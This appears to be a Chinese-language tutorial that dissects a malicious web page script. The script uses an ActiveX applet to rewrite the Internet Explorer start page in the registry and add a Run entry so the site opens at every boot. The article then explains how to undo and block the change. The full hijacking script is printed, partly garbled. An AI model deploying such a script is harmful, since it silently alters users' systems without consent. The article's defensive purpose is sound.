解剖惡意網站代碼

　　許多網友紛紛指出有的網站不擇手段，當用戶訪問過它們的網頁后，不僅IE默認首頁被篡改了，而且每次開機后IE都會自動彈出訪問該網站。
　　我們通過對下面這段JavaScript程序的解剖，希望讀者能明白其究竟，并掌握修復的方法。網站應該用豐富精彩的欄目來吸引訪問者，希望通過對用戶注冊表的惡意篡改來達到提高訪問量的目的不僅會事得其反，更是一種不道德的行為。
　　本代碼由子昂軒編輯制作，僅供學習研究之用。
＜!-- Begin set start page brought to u by JavaHouse.126.com--＞
＜SCRIPT language=JavaScript＞
document.write("＜APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXCompon
ent＞＜/APPLET＞");
function f(){
try
{
//ActiveX初始化過程(為達到修改用戶注冊表所必須的準備程序)
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents .cookie.indexOf("Chg") == -1)
//以下是檢測用戶注冊表并修改相應的鍵值
{
Shl.RegWrite ("HKCU\Software\Microsoft\
　　Internet Explorer\Main\Start Page", ""
);//修改用戶InternetExplorer瀏覽器的默認主頁
Shl.RegWrite ("HKCU\Software\Microsoft\Windows\
　　CurrentVersion\Run\", "建立默認啟動頁面程序，保證用戶每次啟動計算機首先打開該頁面
var expdate = new Date((new Date()).getTime() + (1));
documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path
=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);//實現打開頁面后1秒鐘內執行測試修改注冊表的工作
}
init();＜/SCRIPT＞
＜!--End set start page --＞
　　首先，我們來分析一下這句代碼，程序中使用：
Shl.RegWrite ("HKCU\Software\
　　Microsoft\Internet Explorer\Main\Start Page",
　　"修改用戶InternetExplorer瀏覽器的默認主頁，其實就是修改用戶注冊表中HKEY_CURRENT_USERSoftwareMicrosoftInternet Explorermain文件夾下Start Page的鍵值，這里面的值就是存放的IE瀏覽器的默認主頁，如果你想改回來，把上面的相應代碼改為
：
Shl.RegWrite ("HKCU\Software\Microsoft\
　　Internet Explorer\Main\Start Page", "about:blank");
　　就可以實現打開IE是空白頁了；當然你也不用動注冊表，直接打開IE修改Internet選項中的主頁更方便些。
　　再來看看上述程序最卑鄙的一句代碼：
　　Shl.RegWrite ("HKCU\Software\Microsoft\
　　Windows\CurrentVersion\Run\","
建立默認啟動頁面程序，保證用戶每次啟動計算機首先打開該頁面通過在注冊表中
HKEY_CURRENT_USERSoftwareMicrosoftWindows
　　CurrentVersionRun
　　文件夾下建立Windows默認啟動程序，當Windows啟動后，我們會發現這個網頁會自動打開，但是在“開始”－“程序”－“啟動”中卻找不到，這是為什么呢？哦，原來都放到Run這個文件夾下面了。怎么來修改呢？兩種方法，一是查找源頭，進入注冊表，刪除Run下面的相應項就可以了；二是在“開始”－“運行”處輸入"msconfig"，把啟動下面相應的那個網站前面的"√"去掉，重新啟動計算機就可以了。
　　
　　避免此類惡意修改注冊表的再次發生，你可以在IE的安全屬性設置中禁掉ActiveX，當然在以后的網頁瀏覽過程中可能會造成一些正常使用ActiveX的網站無法瀏覽。還有一種辦法就是對于Windows98打開C:WINDOWSJAVAPackagesCVLV1NBB.ZIP，把ActiveXComponent.class刪掉;對于WindowsMe打開C:WINDOWSJAVAPackages5NZVFPF1.ZIP，把ActiveXComponent.class刪掉。放心，刪除這個組件不會影響你正常瀏覽網頁的。
　　最后說說在首頁使用這類代碼的網站的目的，像在啟動計算機直接打開網頁的做法我認為主要是針對寬帶和專線上網的用戶，這樣只要你不修改注冊表禁掉它，你的IE主頁每次進入系統都會自動被修改成那個網站；對于撥號上網的用戶每次進入系統都開一個找不到的主頁，也無所謂，至少你不改注冊表，直接修改IE主頁屬性后可以避免被那種網站再次修改（前提是不再進那個網站），可是每次開機后都彈出個網頁也真是讓人討厭。
　　以上代碼適用于Windows9x/Me，InternetExplorer5.X瀏覽器，據說對IE6.0無效（因為它里面沒有ActiveXComponent.class這個組件），但作者沒有測試過。

原文轉自：http://www.kjueaiud.com